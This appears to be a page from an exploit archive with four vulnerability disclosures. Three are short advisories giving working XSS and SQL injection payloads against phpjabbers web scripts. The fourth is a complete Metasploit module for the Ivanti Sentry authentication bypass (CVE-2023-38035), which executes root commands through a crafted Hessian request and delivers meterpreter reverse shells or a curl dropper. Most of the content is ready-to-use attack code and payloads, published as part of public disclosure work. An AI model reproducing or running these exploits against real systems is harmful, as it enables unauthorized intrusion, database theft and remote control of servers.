<pre><code>## Title: Night Club Booking Software-1.0 XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 09/09/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo<br />## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected<br /><br />## Description:<br />The value of the index request parameter is copied into the value of an<br />HTML tag attribute which is encapsulated in double quotation marks. The<br />payload byymt"><script>alert(1)</script>fs5xr was submitted in the index<br />parameter. This input was echoed unmodified in the application's response.<br />The attacker can trick the victim into executing arbitrary commands or<br />code on his machine remotely.<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Test Payload:<br />```GET<br />/1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date=<br />HTTP/1.1<br />Host: demo.phpjabbers.com<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178;<br />_gat=1; _fbp=fb.1.1694256177815.1029224882<br />X-Requested-With: XMLHttpRequest<br />Referer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116",<br />"Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />## Reproduce:<br />[href](<br />https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0<br />)<br /><br />## Proof and Exploit:<br />[href](<br />https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html<br />)<br /><br />## Time spent:<br />00:05:00<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)',<br /> 'Description' => %q{<br /> This module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which<br /> allows for code execution in the context of the root user.<br /> },<br /> 'Author' => [<br /> 'Zach Hanley', # Analysis & PoC<br /> 'James Horseman', # Analysis & PoC<br /> 'jheysel-r7' # Msf module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/horizon3ai/CVE-2023-38035'],<br /> [ 'URL', 'https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/'],<br /> [ 'CVE', '2023-38035']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8443,<br /> 'SSL' => true,<br /> 'FETCH_WRITABLE_DIR' => '/tmp'<br /> },<br /> 'Platform' => ['unix', 'linux'],<br /> 'Privileged' => false,<br /> 'Arch' => [ ARCH_CMD, ARCH_X64 ],<br /> 'Targets' => [<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'DefaultOptions' => {<br /> 'CMDSTAGER::FLAVOR' => :curl,<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-08-21',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptBool.new('USE_SUDO', [true, 'Execute payload as root using sudo', true]),<br /> OptInt.new('SLEEP', [true, 'How long to wait for each command to run. Because the execution context does not allow for command piping or chaining the module needs to split the multi command payload by semi-colon and send each command individually', 3 ]),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # Unauthenticated access to the vulnerable endpoint was removed in patched versions of Sentry.<br /> # Send an unsupported GET request and see if it responds politely.<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),<br /> 'method' => 'GET'<br /> )<br /><br /> return Exploit::CheckCode::Unknown('The target did not respond to the vulnerable endpoint') unless res<br /> return Exploit::CheckCode::Safe("A vulnerable instance should respond with an HTTP 405 with the string: 'HessianServiceExporter only supports POST requests' in the response body") unless res.code == 405 && res.body.include?('HessianServiceExporter only supports POST requests')<br /><br /> Exploit::CheckCode::Appears<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # Below is the Hessian binary web service protocol wrapper required to invoke the function `uploadFileUsingFileInput`<br /> # which allows for unauthenticated command execution in the context of the root user.<br /> # More info on Hessian: http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers<br /><br /> exploit_header = "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00"<br /> exploit_footer = "S\x00\x06isRootTzNz"<br /><br /> # The sink in this RCE is java's Runtime.getRuntime.exec(). So we must prefix our command with 'sh -c $@|sh .echo'<br /> # in order to obtain full shell functionality, more info: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html<br /> cmd = "sh -c $@|sh . echo #{cmd}"<br /> cmd = "sudo #{cmd}" if datastore['USE_SUDO']<br /><br /> vprint_status('Running the command: ' + cmd)<br /><br /> # Prepend the command with the length of the command as per Hessian notation<br /> data = exploit_header + [cmd.length].pack('C') + cmd + exploit_footer<br /> res = send_request_raw(<br /> 'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),<br /> 'method' => 'POST',<br /> 'data' => data<br /> )<br /><br /> fail_with(Failure::Unreachable, 'The target did not respond to the exploit attempt') unless res<br /> fail_with(Failure::UnexpectedReply, "The response from a successful exploit attempt should be a HTTP 200 with 'isRunning' in the response body.") unless res.code == 200 && res.body.include?('isRunning')<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>## Title: PHP Shopping Cart-4.2 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 09/13/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `id` parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the id parameter, and a database error<br />message was returned. Two single quotes were then submitted and the<br />error message disappeared. The attacker easily can steal all<br />information from the database of this web application!<br />WARNING! All of you: Be careful what you buy! This will be your responsibility!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT<br />3795=3795-- sRcp&session_id=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND<br />GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT<br />(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND<br />(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html)<br /><br />## Time spent:<br />00:37:00<br /><br /><br /></code></pre>
<pre><code>## Title: Fundraising Script-1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 09/13/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `cid` parameter appears to be vulnerable to SQL injection attacks.<br />The payload ' was submitted in the cid parameter, and a database error<br />message was returned.<br />The database is empty, but if it is not, this will be over for the<br />money of the donors and their bank accounts!<br />The attacker can steal all information from the database!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: cid (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)<br /> Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT<br />(ELT(1741=1741,1))),0x7162787171),3873))<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/fundraising-script-10-sqli.html)<br /><br />## Time spent:<br />01:15:00<br /><br /><br /></code></pre>
